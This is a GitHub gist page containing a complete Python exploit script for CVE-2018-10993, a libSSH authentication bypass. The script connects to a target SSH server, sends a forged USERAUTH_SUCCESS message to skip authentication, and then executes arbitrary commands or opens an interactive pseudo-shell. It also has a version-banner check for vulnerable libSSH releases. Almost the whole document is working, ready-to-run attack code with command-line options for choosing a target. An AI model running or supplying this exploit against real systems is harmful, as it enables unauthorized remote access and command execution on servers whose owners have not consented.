-
-
Save jam620/599b33e3a7698c9570d13ccef482dcc0 to your computer and use it in GitHub Desktop.
CVE-2018-10993 libSSH authentication bypass exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# | |
# CVE-2018-10993 libSSH authentication bypass exploit | |
# | |
# The libSSH library has flawed authentication/connection state-machine. | |
# Upon receiving from connecting client the MSG_USERAUTH_SUCCESS Message | |
# (as described in RFC4252, sec. 5.1.) which is an authentication response message | |
# that should be returned by the server itself (not accepted from client) | |
# the libSSH switches to successful post-authentication state. In such state, | |
# it impersonates connecting client as server's root user and begins executing | |
# delivered commands. | |
# This results in opening an authenticated remote-access channel | |
# without any authentication attempts (authentication bypass). | |
# | |
# Below exploit contains modified code taken from: | |
# - https://github.com/leapsecurity/libssh-scanner | |
# | |
# Known issues: | |
# - UnauthSSH.shell() function is not working: | |
# I never got paramiko.Channel.invoke_shell() into working from custom | |
# transport object. Therefore as a workaround - `UnauthSSH.parashell()` function | |
# was implemented that substitutes original functionality of spawning shell. | |
# | |
# Requirements: | |
# - paramiko | |
# | |
# Mariusz B. / mgeeky, <[email protected]> | |
# | |
import sys | |
import socket | |
import time | |
import argparse | |
from sys import argv, exit | |
try: | |
import paramiko | |
except ImportError: | |
print('[!] Paramiko required: python3 -m pip install paramiko') | |
sys.exit(1) | |
VERSION = '0.1' | |
config = { | |
'debug' : False, | |
'verbose' : False, | |
'host' : '', | |
'port' : 22, | |
'log' : '', | |
'connection_timeout' : 5.0, | |
'session_timeout' : 10.0, | |
'buflen' : 4096, | |
'command' : '', | |
'shell' : False, | |
} | |
class Logger: | |
@staticmethod | |
def _out(x): | |
if config['debug'] or config['verbose']: | |
sys.stdout.write(x + '\n') | |
@staticmethod | |
def dbg(x): | |
if config['debug']: | |
sys.stdout.write('[dbg] ' + x + '\n') | |
@staticmethod | |
def out(x): | |
Logger._out('[.] ' + x) | |
@staticmethod | |
def info(x): | |
Logger._out('[?] ' + x) | |
@staticmethod | |
def err(x): | |
sys.stdout.write('[!] ' + x + '\n') | |
@staticmethod | |
def fail(x): | |
Logger._out('[-] ' + x) | |
@staticmethod | |
def ok(x): | |
Logger._out('[+] ' + x) | |
class UnauthSSH(): | |
def __init__(self): | |
self.host = config['host'] | |
self.port = config['port'] | |
self.sock = None | |
self.transport = None | |
self.connectionInfoOnce = False | |
def __del__(self): | |
if self.sock: | |
self.sock.close() | |
def sshAuthBypass(self, force = False): | |
if not force and (self.transport and self.transport.is_active()): | |
Logger.dbg('Returning already issued SSH Transport') | |
return self.transport | |
self.__del__() | |
self.sock = socket.socket() | |
if not self.connectionInfoOnce: | |
self.connectionInfoOnce = True | |
Logger.info('Connecting with {}:{} ...'.format( | |
self.host, self.port | |
)) | |
try: | |
self.sock.connect((str(self.host), int(self.port))) | |
Logger.ok('Connected.') | |
except Exception as e: | |
Logger.fail('Could not connect to {}:{} . Exception: {}'.format( | |
self.host, self.port, str(e) | |
)) | |
sys.exit(1) | |
message = paramiko.message.Message() | |
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) | |
transport = paramiko.transport.Transport(self.sock) | |
transport.start_client(timeout = config['connection_timeout']) | |
transport._send_message(message) | |
self.transport = transport | |
return transport | |
def NOT_WORKING_shell(self): | |
# FIXME: invoke_shell() closes channel prematurely. | |
transport = self.sshAuthBypass() | |
session = transport.open_session(timeout = config['session_timeout']) | |
session.set_combine_stdLogger.err(True) | |
session.get_pty() | |
session.invoke_shell() | |
username = UnauthSSH._send_recv(session, 'username') | |
hostname = UnauthSSH._send_recv(session, 'hostname') | |
prompt = '{}@{} $ '.format(username, hostname) | |
while True: | |
inp = input(prompt).strip() | |
if inp.lower() in ['exit', 'quit'] or not inp: | |
Logger.info('Quitting...') | |
break | |
out = UnauthSSH._send_recv(session, inp) | |
if not out: | |
Logger.err('Could not constitute stable shell.') | |
return | |
print(out) | |
def shell(self): | |
self.parashell() | |
def parashell(self): | |
username = self.execute('whoami') | |
hostname = self.execute('hostname') | |
prompt = '{}@{} $ '.format(username, hostname) | |
if not username or not hostname: | |
Logger.fail('Could not obtain username ({}) and/or hostname ({})!'.format( | |
username, hostname | |
)) | |
return | |
Logger.info('Entering pseudo-shell...') | |
while True: | |
inp = input(prompt).strip() | |
if inp.lower() in ['exit', 'quit'] or not inp: | |
Logger.info('Quitting...') | |
break | |
out = self.execute(inp) | |
if not out: | |
Logger.err('Could not constitute stable shell.') | |
return | |
print(out) | |
# FIXME: Not used as NOT_WORKING_shell() is bugged. | |
@staticmethod | |
def _send_recv(session, cmd): | |
out = '' | |
session.send(cmd.strip() + '\n') | |
MAX_TIMEOUT = config['session_timeout'] | |
timeout = 0.0 | |
while not session.exit_status_ready(): | |
time.sleep(0.1) | |
timeout += 0.1 | |
if timeout > MAX_TIMEOUT: | |
return None | |
if session.recv_ready(): | |
out += session.recv(config['buflen']).decode() | |
if session.recv_stderr_ready(): | |
out += session.recv_stdLogger.err(config['buflen']).decode() | |
while session.recv_ready(): | |
out += session.recv_ready(config['buflen']) | |
return out | |
@staticmethod | |
def _exec(session, inp): | |
inp = inp.strip() | |
Logger.dbg('Executing command: "{}"'.format(inp)) | |
session.exec_command(inp + '\n') | |
retcode = session.recv_exit_status() | |
buf = '' | |
while session.recv_ready(): | |
buf += session.recv(config['buflen']).decode() | |
buf = buf.strip() | |
Logger.dbg('Returned:\n{}'.format(buf)) | |
return buf | |
def execute(self, cmd, printout = False, tryAgain = False): | |
transport = self.sshAuthBypass(force = tryAgain) | |
session = transport.open_session(timeout = config['session_timeout']) | |
session.set_combine_stderr(True) | |
buf = '' | |
try: | |
buf = UnauthSSH._exec(session, cmd) | |
except paramiko.SSHException as e: | |
if 'channel closed' in str(e).lower() and not tryAgain: | |
return self.execute(cmd, printout, True) | |
if printout and not tryAgain: | |
Logger.fail('Could not execute command ({}): "{}"'.format(cmd, str(e))) | |
return '' | |
if printout: | |
print('\n{} $ {}'.format(self.host, cmd)) | |
print('{}'.format(buf)) | |
return buf | |
def exploit(): | |
handler = UnauthSSH() | |
if config['command']: | |
out = handler.execute(config['command']) | |
Logger._out('\n$ {}'.format(config['command'])) | |
print(out) | |
else: | |
handler.shell() | |
def collectBanner(): | |
ip = config['host'] | |
port = config['port'] | |
try: | |
s = socket.create_connection((ip, port), timeout = config['connection_timeout']) | |
Logger.ok('Connected to the target: {}:{}'.format(ip, port)) | |
s.settimeout(None) | |
banner = s.recv(config['buflen']) | |
s.close() | |
return banner.split(b"\n")[0] | |
except (socket.timeout, socket.error) as e: | |
Logger.fail('SSH connection timeout.') | |
return "" | |
def check(): | |
global config | |
if not config['command'] and not config['shell']: | |
config['verbose'] = True | |
banner = collectBanner() | |
if banner: | |
Logger.info('Obtained banner: "{}"'.format(banner.decode().strip())) | |
# | |
# NOTICE: The below version-checking logic was taken from: | |
# - https://github.com/leapsecurity/libssh-scanner | |
# | |
if any(version in banner for version in [b"libssh-0.6", b"libssh_0.6"]): | |
Logger.ok('Target seems to be VULNERABLE!') | |
elif any(version in banner for version in [b"libssh-0.7", b"libssh_0.7"]): | |
# libssh is 0.7.6 or greater (patched) | |
if int(banner.split(b".")[-1]) >= 6: | |
Logger.info('Target seems to be PATCHED.') | |
else: | |
Logger.ok('Target seems to be VULNERABLE!') | |
return True | |
elif any(version in banner for version in [b"libssh-0.8", b"libssh_0.8"]): | |
# libssh is 0.8.4 or greater (patched) | |
if int(banner.split(b".")[-1]) >= 4: | |
Logger.info('Target seems to be PATCHED.') | |
else: | |
Logger.ok('Target seems to be VULNERABLE!') | |
return True | |
else: | |
Logger.fail('Target is not vulnerable.') | |
else: | |
Logger.err('Could not obtain SSH service banner.') | |
return False | |
def parse_opts(): | |
global config | |
parser = argparse.ArgumentParser(description = 'If there was neither shell nor command option specified - exploit will switch to detect mode yielding vulnerable/not vulnerable flag.') | |
parser.add_argument('host', help='Hostname/IP address that is running vulnerable libSSH server.') | |
parser.add_argument('-p', '--port', help='libSSH port', default = 22) | |
parser.add_argument('-s', '--shell', help='Exploit the vulnerability and spawn pseudo-shell', action='store_true', default = False) | |
parser.add_argument('-c', '--command', help='Execute single command. ', default='') | |
parser.add_argument('--logfile', help='Logfile to write paramiko connection logs', default = "") | |
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.') | |
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.') | |
args = parser.parse_args() | |
try: | |
config['host'] = args.host | |
config['port'] = args.port | |
config['log'] = args.logfile | |
config['command'] = args.command | |
config['shell'] = args.shell | |
config['verbose'] = args.verbose | |
config['debug'] = args.debug | |
if args.shell and args.command: | |
Logger.err('Shell and command options are mutually exclusive!\n') | |
raise Exception() | |
except: | |
parser.print_help() | |
return False | |
return True | |
def main(): | |
sys.stderr.write(''' | |
:: CVE-2018-10993 libSSH authentication bypass exploit. | |
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication. | |
Mariusz B. / mgeeky '18, <[email protected]> | |
v{} | |
'''.format(VERSION)) | |
if not parse_opts(): | |
return False | |
if config['log']: | |
paramiko.util.log_to_file(config['log']) | |
check() | |
if config['command'] or config['shell']: | |
exploit() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment